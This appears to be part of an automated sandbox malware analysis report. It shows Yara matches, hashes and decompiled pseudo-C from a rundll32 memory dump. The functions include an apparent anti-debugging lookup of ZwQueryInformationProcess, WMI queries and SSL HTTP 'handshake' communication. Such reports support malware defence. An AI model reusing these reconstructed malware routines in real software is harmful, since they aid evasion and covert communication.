                                        • Instruction Fuzzy Hash: C741963120068141FF209B66DC587EB66D5F7A5B94F46822A9E5946FD6DA3CCE43C310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_statfp
                                        • String ID:
                                        • API String ID: 1156100317-0
                                        • Opcode ID: 5b1db35181187496796844778d53a522521f3efe2ad519d1bc34747997f719b6
                                        • Instruction ID: d2bae055d34248bb1f9166dd2ffb329f1d4fdb459497fc57cdc72b5bf36b769c
                                        • Opcode Fuzzy Hash: 5b1db35181187496796844778d53a522521f3efe2ad519d1bc34747997f719b6
                                        • Instruction Fuzzy Hash: 5711C232750B0105FE681128EC4E3FBF0F16B74BB0F5B4628AF6706ED68A5C8847D240
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
                                        • String ID:
                                        • API String ID: 3892215915-0
                                        • Opcode ID: c6531bed6f963c5cd30070fcdf949bee20af488ac0472414f382169d03fd255f
                                        • Instruction ID: 5b1b66d6d96e00eb817c419faa95508309bce8fc9fac1ac5701bbc3ba21af9ee
                                        • Opcode Fuzzy Hash: c6531bed6f963c5cd30070fcdf949bee20af488ac0472414f382169d03fd255f
                                        • Instruction Fuzzy Hash: 94018836211E41C2EF10CB39EC5815A73B0F799F68F468111CD5D4BAA4EF38C096C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 23%
                                        			E0000021E21EF2FF5850(void* __ebx, void* __ecx, void* __edx, signed int __edi, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, signed int _a24, void* _a32) {
                                        				void* _v8;
                                        				char _v96;
                                        				char _v168;
                                        				char _v408;
                                        				char _v512;
                                        				char _v520;
                                        				char _v560;
                                        				char _v584;
                                        				char _v608;
                                        				char _v640;
                                        				char _v664;
                                        				char _v680;
                                        				char _v696;
                                        				long long _v704;
                                        				long long _v712;
                                        				long long _v720;
                                        				long long _v736;
                                        				intOrPtr _v744;
                                        				char _v760;
                                        				char _v784;
                                        				long long _v792;
                                        				char _v800;
                                        				long long _v808;
                                        				long long _v816;
                                        				long long _v824;
                                        				long long _v832;
                                        				char _v840;
                                        				long long _v848;
                                        				char _v856;
                                        				void* __rdi;
                                        				void* _t75;
                                        				void* _t79;
                                        				long long _t80;
                                        				char _t92;
                                        				void* _t105;
                                        				signed int _t113;
                                        				void* _t114;
                                        				long long _t127;
                                        				long long _t129;
                                        				void* _t134;
                                        				long long _t160;
                                        				void* _t179;
                                        				void* _t182;
                                        				long long _t183;
                                        				char* _t188;
                                        				void* _t192;
                                        
                                        				_t186 = __r8;
                                        				_t182 = __rbp;
                                        				_t180 = __rsi;
                                        				_t165 = __rdx;
                                        				_t105 = __ebx;
                                        				_t127 = _t183;
                                        				 *((long long*)(_t127 - 0x2d8)) = 0xfffffffe;
                                        				 *((long long*)(_t127 + 8)) = __rbx;
                                        				 *((long long*)(_t127 + 0x10)) = __rsi;
                                        				_t179 = __rdx;
                                        				_t134 = __rcx;
                                        				sil = 1;
                                        				E0000021E21EF2FEFE70(__edx, _t127, __rcx,  &_v784, __r8);
                                        				_t75 = E0000021E21EF2FF50D0(__edx, _t134,  &_v640);
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x80], xmm0");
                                        				E0000021E21EF3001C60(_t75,  &_v760, _t165, _t186, _t192);
                                        				E0000021E21EF2FEE9E0(_t134, _v784,  &_v760, E0000021E21EF3001C90,  &_v784);
                                        				_v808 = _t127;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [esp+0x58], xmm0");
                                        				r8d = _a24 & 0x000000ff;
                                        				E0000021E21EF2FF9B20(__edi, _t134,  &_v800);
                                        				_t188 =  &_v640;
                                        				_t79 = E0000021E21EF2FF9C30(_t105, _t127,  &_v520,  &_v784, _t182, _t188);
                                        				if ( *((long long*)(_t134 + 0x18)) - 0x10 < 0) goto 0xf2ff5912;
                                        				goto 0xf2ff5915;
                                        				r8d = 0;
                                        				_t17 = _t188 + 0x37; // 0x37
                                        				E0000021E21EF30DD4D0();
                                        				if (_t79 != 0) goto 0xf2ff5979;
                                        				_t80 = E0000021E21EF3021AE0(_t127);
                                        				E0000021E21EF2FF4EB0(_v408,  &_v784);
                                        				_v824 = _t80;
                                        				_v816 = _t127;
                                        				asm("movaps xmm0, [esp+0x40]");
                                        				asm("movdqa [esp+0xc0], xmm0");
                                        				E0000021E21EF2FEE330(_t134,  &_v168,  &_v696);
                                        				E0000021E21EF31103EC(_t134,  &_v168, 0xf31e4670, __rsi);
                                        				E0000021E21EF2FF69D0( &_v664);
                                        				_v720 =  &_v608;
                                        				_t129 =  &_v584;
                                        				_v712 = _t129;
                                        				E0000021E21EF2FF66C0(_t129,  &_v608);
                                        				_t135 = _t129;
                                        				E0000021E21EF2FF6700(_t129,  &_v664,  &_v584, _t180);
                                        				E0000021E21EF2FF9CF0(__edi, _t129,  &_v560,  &_v512, _t129, _t129);
                                        				0xf2ff2b00();
                                        				_v840 = 0;
                                        				E0000021E21EF310D880( &_v560,  &_v512);
                                        				_v832 = _t129;
                                        				_a24 = 0;
                                        				E0000021E21EF2FFA5F0(_t17, __edi, _t114, _t129, _t135,  &_v512,  &_v408, _t179, _t180,  &_a24,  &_v840);
                                        				if (_v840 == 0) goto 0xf2ff5a4b;
                                        				0xf2fee680();
                                        				_v856 = 0;
                                        				E0000021E21EF310D880( &_v840, "handshake");
                                        				_v848 = _t129;
                                        				E0000021E21EF2FFA380(_t17, __edi, _t114, _v840, _t129, _t135,  &_v512,  &_v408, _t179, _t180,  &_a24,  &_v856);
                                        				0xf2fee810();
                                        				_v704 = _t129;
                                        				_v744 = 2;
                                        				_v736 = _t129;
                                        				asm("movaps xmm0, [esp+0x90]");
                                        				asm("movdqa [esp+0x160], xmm0");
                                        				_t92 = _v856;
                                        				if (_v848 != _t129) goto 0xf2ff5ab4;
                                        				if (_t92 == 2) goto 0xf2ff5af0;
                                        				if (_t92 == 0) goto 0xf2ff5af0;
                                        				asm("movaps xmm0, [esp+0x20]");
                                        				asm("movdqa [esp+0xd0], xmm0");
                                        				E0000021E21EF2FEE330(_t135,  &_v96,  &_v680);
                                        				E0000021E21EF31103EC(_t135,  &_v96, 0xf31e4670, _t180);
                                        				E0000021E21EF2FF5BD0(__edi, _t135,  &_v664);
                                        				E0000021E21EF2FF5710(_t92, _t135,  &_v408, _t180,  &_v856);
                                        				_v824 =  &_v512;
                                        				E0000021E21EF2FF8910(__edi, _t135,  &_v512);
                                        				E0000021E21EF2FF6E60(__edi, _t135,  &_v800,  &_a24);
                                        				_t160 = _v792;
                                        				_t113 = __edi | 0xffffffff;
                                        				if (_t160 == 0) goto 0xf2ff5b7e;
                                        				_a32 = _t160;
                                        				asm("lock xadd [ecx+0x8], eax");
                                        				if (_t113 != 1) goto 0xf2ff5b7e;
                                        				 *((intOrPtr*)( *_a32))();
                                        				asm("lock xadd [ebx+0xc], eax");
                                        				if (_t113 != 1) goto 0xf2ff5b7e;
                                        				 *((intOrPtr*)( *_a32 + 8))();
                                        				E0000021E21EF2FF51A0(_t113,  *_a32, _a32,  &_v640);
                                        				asm("lock xadd [0x215a9c], edi");
                                        				if (_t113 != 1) goto 0xf2ff5ba0;
                                        				__imp__#116();
                                        				0xf2feed90();
                                        				return sil & 0xffffffff;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionLeaveThrow$CleanupStartup
                                        • String ID: handshake
                                        • API String ID: 1678628239-3879415452
                                        • Opcode ID: 37d834908d4b2458d41a416d311abbe7045e5990e4d65ff35c772aaecf1df110
                                        • Instruction ID: d5e515954313fef666f8b12a4c37e081b226cdabffa4bb2595664e7339667486
                                        • Opcode Fuzzy Hash: 37d834908d4b2458d41a416d311abbe7045e5990e4d65ff35c772aaecf1df110
                                        • Instruction Fuzzy Hash: 6F916373118AC691DE709B24E8853DEA364F7E5750F414212EE8D53EA9EF78C586CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: ZwQueryInformationProcess$ntdll.dll
                                        • API String ID: 1646373207-132032222
                                        • Opcode ID: 79f0206e3732600b83d501743db93a9b2054c95e8027ec3ff63a98278aaf4209
                                        • Instruction ID: 33b13c0dc42164a81a801910780af0e3c493595f854531dceb75c94c6a5b04bd
                                        • Opcode Fuzzy Hash: 79f0206e3732600b83d501743db93a9b2054c95e8027ec3ff63a98278aaf4209
                                        • Instruction Fuzzy Hash: 0E516931311B4082FF25DB2AE8147DB67A4FBA8B84F464426AE4D57B9ADF3CC646C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF301D7D3(signed int __ecx, void* __esi, char* __rbx, intOrPtr* __rsi, void* __r9, void* __r12, long long __r13) {
                                        				void* _t118;
                                        				void* _t119;
                                        				void* _t125;
                                        				void* _t128;
                                        				intOrPtr _t176;
                                        				intOrPtr _t178;
                                        				long long* _t179;
                                        				long long* _t180;
                                        				char* _t190;
                                        				intOrPtr* _t192;
                                        				intOrPtr _t194;
                                        				void* _t195;
                                        				intOrPtr* _t199;
                                        				intOrPtr _t200;
                                        				intOrPtr* _t210;
                                        				intOrPtr* _t212;
                                        				intOrPtr* _t228;
                                        				void* _t239;
                                        				short* _t240;
                                        				intOrPtr* _t245;
                                        				intOrPtr* _t246;
                                        				long long* _t257;
                                        				void* _t259;
                                        
                                        				_t190 = __rbx;
                                        				_t192 =  *((intOrPtr*)(_t259 + 0x60));
                                        				if (_t192 == 0) goto 0xf301d7e3;
                                        				 *((intOrPtr*)( *_t192 + 0x10))();
                                        				 *((long long*)(__rbx + 0x18)) = 0xf;
                                        				 *((long long*)(__rbx + 0x10)) = __r13;
                                        				 *__rbx = 0;
                                        				0xf2fe6770();
                                        				 *((intOrPtr*)(_t259 + 0x50)) = 1;
                                        				_t176 =  *((intOrPtr*)(_t257 - 0x78));
                                        				if (_t176 - 0x10 < 0) goto 0xf301d76f;
                                        				_t194 =  *((intOrPtr*)(_t259 + 0x70));
                                        				if (_t176 + 1 - 0x1000 < 0) goto 0xf301d76a;
                                        				if ((__ecx & 0x0000001f) == 0) goto 0xf301d834;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				_t178 =  *((intOrPtr*)(_t194 - 8));
                                        				if (_t178 - _t194 < 0) goto 0xf301d843;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				_t195 = _t194 - _t178;
                                        				if (_t195 - 8 >= 0) goto 0xf301d852;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				if (_t195 - 0x27 <= 0) goto 0xf301d767;
                                        				0xf3111be8();
                                        				_t179 =  *0xf320b520;
                                        				if (_t179 != 0) goto 0xf301d892;
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				 *0xf320b520 = _t179;
                                        				 *((intOrPtr*)(_t259 + 0x38)) = r13d;
                                        				 *((long long*)(_t259 + 0x30)) = __r13;
                                        				 *((intOrPtr*)(_t259 + 0x28)) = 3;
                                        				 *((intOrPtr*)(_t259 + 0x20)) = 3;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				if ( *_t179() >= 0) goto 0xf301d8db;
                                        				_t199 =  *((intOrPtr*)(_t259 + 0x60));
                                        				if (_t199 == 0) goto 0xf301d8d1;
                                        				_t180 =  *_t199;
                                        				 *((intOrPtr*)(_t180 + 0x10))();
                                        				_t200 =  *((intOrPtr*)(_t259 + 0x58));
                                        				goto 0xf301dbed;
                                        				 *((long long*)(_t259 + 0x68)) = __r13;
                                        				if ( *((long long*)(__rsi + 0x18)) - 0x10 < 0) goto 0xf301d8ea;
                                        				_t252 =  *__rsi;
                                        				E0000021E21EF310B674(_t180, _t200);
                                        				 *((long long*)(_t257 + 0xa8)) = _t180;
                                        				if (_t180 == 0) goto 0xf301d91b;
                                        				 *((long long*)(_t180 + 8)) = __r13;
                                        				 *((intOrPtr*)(_t180 + 0x10)) = 1;
                                        				_t201 =  *__rsi;
                                        				E0000021E21EF310D920(_t128, __rbx,  *__rsi,  *__rsi);
                                        				 *_t180 = _t180;
                                        				goto 0xf301d91e;
                                        				 *((long long*)(_t257 + 8)) = __r13;
                                        				if (__r13 != 0) goto 0xf301d932;
                                        				E0000021E21EF310D8F0();
                                        				E0000021E21EF310B674(_t180, _t201);
                                        				 *((long long*)(_t257 + 0xa8)) = _t180;
                                        				if (_t180 == 0) goto 0xf301d967;
                                        				 *((long long*)(_t180 + 8)) = __r13;
                                        				 *((intOrPtr*)(_t180 + 0x10)) = 1;
                                        				E0000021E21EF310D920(_t128, _t190, "WQL", _t252);
                                        				 *_t180 = _t180;
                                        				goto 0xf301d96a;
                                        				 *_t257 = __r13;
                                        				if (__r13 != 0) goto 0xf301d97e;
                                        				E0000021E21EF310D8F0();
                                        				 *((long long*)(_t259 + 0x28)) = _t259 + 0x68;
                                        				 *((long long*)(_t259 + 0x20)) = __r13;
                                        				r9d = 0x30;
                                        				r15d =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t259 + 0x58)))) + 0xa0))();
                                        				asm("lock inc ecx");
                                        				if (__esi != 1) goto 0xf301d9eb;
                                        				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301d9cc;
                                        				__imp__#6();
                                        				 *((long long*)(__r13)) = __r13;
                                        				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301d9de;
                                        				0xf310bdc8();
                                        				 *((long long*)(__r13 + 8)) = __r13;
                                        				0xf310bdc8();
                                        				 *_t257 = __r13;
                                        				asm("lock xadd [edi+0x10], eax");
                                        				if (__esi != 1) goto 0xf301da2b;
                                        				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301da0c;
                                        				__imp__#6();
                                        				 *((long long*)(__r13)) = __r13;
                                        				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301da1e;
                                        				0xf310bdc8();
                                        				 *((long long*)(__r13 + 8)) = __r13;
                                        				0xf310bdc8();
                                        				 *((long long*)(_t257 + 8)) = __r13;
                                        				if (r15d >= 0) goto 0xf301da4e;
                                        				_t210 =  *((intOrPtr*)(_t259 + 0x58));
                                        				if (_t210 == 0) goto 0xf301da44;
                                        				 *((intOrPtr*)( *_t210 + 0x10))();
                                        				goto 0xf301dbed;
                                        				_t212 =  *((intOrPtr*)(_t259 + 0x68));
                                        				if (_t212 == 0) goto 0xf301dbbd;
                                        				 *((long long*)(_t257 - 0x70)) = __r13;
                                        				 *((intOrPtr*)(_t257 + 0xa8)) = r13d;
                                        				 *((long long*)(_t259 + 0x20)) = _t257 + 0xa8;
                                        				r8d = 1;
                                        				 *((intOrPtr*)( *_t212 + 0x20))();
                                        				if ( *((intOrPtr*)(_t257 + 0xa8)) == 0) goto 0xf301dbb8;
                                        				__imp__#8();
                                        				if ( *((long long*)(_t257 - 0x70)) == 0) goto 0xf301dbb8;
                                        				0xf3018a7c();
                                        				_t239 =  >=  ?  *((void*)(_t257 - 0x28)) : _t257 - 0x28;
                                        				_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t257 - 0x70))));
                                        				 *((long long*)(_t259 + 0x28)) = __r13;
                                        				 *((long long*)(_t259 + 0x20)) = __r13;
                                        				r8d = 0;
                                        				_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t257 - 0x70)))) + 0x20))();
                                        				_t240 =  *((intOrPtr*)(_t257 + 0x18));
                                        				if (_t240 == 0) goto 0xf301db78;
                                        				 *((long long*)(_t257 - 0x38)) = __r13;
                                        				 *((long long*)(_t257 - 0x30)) = __r13;
                                        				 *((long long*)(_t257 - 0x30)) = 7;
                                        				 *((long long*)(_t257 - 0x38)) = __r13;
                                        				 *((intOrPtr*)(_t257 - 0x48)) = r13w;
                                        				if ( *_t240 != 0) goto 0xf301db10;
                                        				goto 0xf301db1a;
                                        				if ( *((short*)(_t240 + (__r13 + 1) * 2)) != 0) goto 0xf301db10;
                                        				_t119 = E0000021E21EF2FE8020(_t118, __esi, _t184, _t190, _t257 - 0x48, _t240, __r13, __r13 + 1, __r13 + 1);
                                        				0xf3018bcc();
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE7EF0(_t119, __esi, _t190, _t259 + 0x70, _t184), __esi, _t257 + 0x30);
                                        				if ( *((intOrPtr*)(_t257 - 0x30)) - 8 < 0) goto 0xf301db67;
                                        				0xf2fe8550();
                                        				 *((long long*)(_t257 - 0x30)) = 7;
                                        				 *((long long*)(_t257 - 0x38)) = __r13;
                                        				 *((intOrPtr*)(_t257 - 0x48)) = r13w;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t257 - 0x70)))) + 0x10))();
                                        				if ( *((intOrPtr*)(_t257 - 0x10)) - 8 < 0) goto 0xf301dba7;
                                        				0xf2fe8550();
                                        				 *((long long*)(_t257 - 0x10)) = 7;
                                        				 *((long long*)(_t257 - 0x18)) = __r13;
                                        				 *((intOrPtr*)(_t257 - 0x28)) = r13w;
                                        				_t245 =  *((intOrPtr*)(_t259 + 0x58));
                                        				if (_t245 == 0) goto 0xf301dbd5;
                                        				 *((intOrPtr*)( *_t245 + 0x10))();
                                        				_t246 =  *((intOrPtr*)(_t259 + 0x60));
                                        				if (_t246 == 0) goto 0xf301dbed;
                                        				 *((intOrPtr*)( *_t246 + 0x10))();
                                        				_t228 =  *((intOrPtr*)(_t259 + 0x68));
                                        				if (_t228 == 0) goto 0xf301dbf8;
                                        				_t125 =  *((intOrPtr*)( *_t228 + 0x10))();
                                        				 *((long long*)(_t190 + 0x18)) = 0xf;
                                        				 *((long long*)(_t190 + 0x10)) = __r13;
                                        				 *_t190 = 0;
                                        				0xf2fe6770();
                                        				 *((intOrPtr*)(_t259 + 0x50)) = 1;
                                        				return E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t125, __esi, _t259 + 0x70), __esi, _t257 - 0x68);
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: CoSetProxyBlanket$ole32.dll
                                        • API String ID: 1646373207-1829017490
                                        • Opcode ID: d5e14ee62550cef7167e82891b4772f914846d14be73bf144f6102d1eed61d9e
                                        • Instruction ID: 83c3284b2a811edc9020e3677279d26f207e559a8ab33bb0159b5ff60e9e0d49
                                        • Opcode Fuzzy Hash: d5e14ee62550cef7167e82891b4772f914846d14be73bf144f6102d1eed61d9e
                                        • Instruction Fuzzy Hash: 3E412936605B4486FF05AB64E8583EF67A1F7A4B48F110416DE4A07FA6DFBCC48AC750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E0000021E21EF2FFA220(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long __r14) {
                                        				void* _t41;
                                        				void* _t44;
                                        				long long _t47;
                                        				void* _t75;
                                        				void* _t77;
                                        				long long _t78;
                                        				void* _t79;
                                        
                                        				_t47 = _t78;
                                        				_t77 = _t47 - 0x118;
                                        				_t79 = _t78 - 0x210;
                                        				 *((long long*)(_t77 - 0x78)) = 0xfffffffe;
                                        				 *((long long*)(_t47 + 8)) = __rbx;
                                        				 *((long long*)(_t47 + 0x10)) = __rsi;
                                        				 *((long long*)(_t47 + 0x18)) = __rdi;
                                        				 *((long long*)(_t47 + 0x20)) = __r14;
                                        				asm("movaps [eax-0x18], xmm6");
                                        				_t53 = __r8;
                                        				_t75 = __rcx;
                                        				r14d = 0;
                                        				 *((intOrPtr*)(_t79 + 0x20)) = r14d;
                                        				E0000021E21EF310D880(__rcx, __rdx);
                                        				 *((long long*)(_t79 + 0x28)) = _t47;
                                        				0xf2ffedf0();
                                        				if ( *((intOrPtr*)(_t79 + 0x20)) == r14d) goto 0xf2ffa356;
                                        				asm("movaps xmm6, [esp+0x20]");
                                        				 *((long long*)(_t79 + 0x40)) = 0xf319d200;
                                        				 *((long long*)(_t79 + 0x48)) = 0xf319d200;
                                        				 *((long long*)(_t79 + 0x50)) = 0xf319d200;
                                        				 *((long long*)(_t79 + 0x30)) = 0xf31b1da2;
                                        				 *((char*)(_t79 + 0x38)) = 1;
                                        				E0000021E21EF310E0E4(__r8, _t79 + 0x30, _t79 + 0x48, __rdx, _t75);
                                        				 *((long long*)(_t79 + 0x40)) = 0xf319d2a0;
                                        				 *((long long*)(_t79 + 0x40)) = 0xf31b1bc8;
                                        				asm("movups [esp+0x58], xmm6");
                                        				 *((long long*)(_t79 + 0x78)) = __r14;
                                        				 *((long long*)(_t77 - 0x80)) = __r14;
                                        				 *((long long*)(_t77 - 0x80)) = 0xf;
                                        				 *((long long*)(_t79 + 0x78)) = __r14;
                                        				 *((intOrPtr*)(_t79 + 0x68)) = r14b;
                                        				_t41 = E0000021E21EF2FFDF30(0xf31b1bc8, _t53, _t77 + 0x18);
                                        				 *0x21EF31B1C20 = "unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<char>>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,class boost::beast::basic_flat_buffer<class std::allocator<char> > &,struct boost::beast::http::message<0,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
                                        				 *0x21EF31B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/read.ipp";
                                        				 *0x21EF31B1C30 = 0x30d;
                                        				E0000021E21EF3003690(_t41, _t77 + 0x88);
                                        				E0000021E21EF2FFDFB0(_t53, _t77 - 0x70, 0xf31b1bc8, _t75);
                                        				_t44 = E0000021E21EF31103EC(_t53, _t77 - 0x70, 0xf31e4e68, _t75);
                                        				asm("inc ecx");
                                        				return _t44;
                                        			}

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp, xrefs: 0000021EF2FFA317
                                        • unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri, xrefs: 0000021EF2FFA30C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp$unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri
                                        • API String ID: 4076867389-3379936717
                                        • Opcode ID: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction ID: d86aed01c401f21ec592cc28c0ee9ca674035e4e138a79a5465ea42e2f3343a6
                                        • Opcode Fuzzy Hash: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction Fuzzy Hash: B9316D32214B8096EB10DF64E8842DE77B8F7A4794F524226EF9C53BA8DF38C596C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 26%
                                        			E0000021E21EF2FFA0E0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi) {
                                        				void* _t39;
                                        				long long _t46;
                                        				void* _t71;
                                        				long long _t73;
                                        				void* _t75;
                                        				long long _t76;
                                        				void* _t77;
                                        
                                        				_t73 = __rsi;
                                        				_t46 = _t76;
                                        				_t75 = _t46 - 0x108;
                                        				_t77 = _t76 - 0x200;
                                        				 *((long long*)(_t75 - 0x78)) = 0xfffffffe;
                                        				 *((long long*)(_t46 + 8)) = __rbx;
                                        				 *((long long*)(_t46 + 0x10)) = __rsi;
                                        				 *((long long*)(_t46 + 0x18)) = __rdi;
                                        				_t52 = __rdx;
                                        				_t71 = __rcx;
                                        				 *((intOrPtr*)(_t77 + 0x20)) = 0;
                                        				E0000021E21EF310D880(__rcx, __rdx);
                                        				 *((long long*)(_t77 + 0x28)) = _t46;
                                        				0xf2ffec90();
                                        				if ( *((intOrPtr*)(_t77 + 0x20)) == 0) goto 0xf2ffa205;
                                        				 *((long long*)(_t77 + 0x40)) = 0xf319d200;
                                        				 *((long long*)(_t77 + 0x48)) = 0xf319d200;
                                        				 *((long long*)(_t77 + 0x50)) = 0xf319d200;
                                        				 *((long long*)(_t77 + 0x30)) = 0xf31b1da2;
                                        				 *((char*)(_t77 + 0x38)) = 1;
                                        				E0000021E21EF310E0E4(__rdx, _t77 + 0x30, _t77 + 0x48, _t71, __rsi);
                                        				 *((long long*)(_t77 + 0x40)) = 0xf319d2a0;
                                        				 *((long long*)(_t77 + 0x40)) = 0xf31b1bc8;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [esp+0x58], xmm0");
                                        				 *((long long*)(_t77 + 0x78)) = _t73;
                                        				 *((long long*)(_t75 - 0x80)) = _t73;
                                        				 *((long long*)(_t75 - 0x80)) = 0xf;
                                        				 *((long long*)(_t77 + 0x78)) = _t73;
                                        				 *((intOrPtr*)(_t77 + 0x68)) = sil;
                                        				_t39 = E0000021E21EF2FFDF30(0xf31b1bc8, __rdx, _t75 + 0x18);
                                        				 *0x21EF31B1C20 = "unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> >>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,const struct boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
                                        				 *0x21EF31B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/write.ipp";
                                        				 *0x21EF31B1C30 = 0x323;
                                        				E0000021E21EF3003690(_t39, _t75 + 0x88);
                                        				E0000021E21EF2FFDFB0(_t52, _t75 - 0x70, 0xf31b1bc8, _t73);
                                        				return E0000021E21EF31103EC(_t52, _t75 - 0x70, 0xf31e4e68, _t73);
                                        			}

                                        APIs
                                        Strings
                                        • unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha, xrefs: 0000021EF2FFA1BB
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp, xrefs: 0000021EF2FFA1C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp$unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha
                                        • API String ID: 4076867389-3407313142
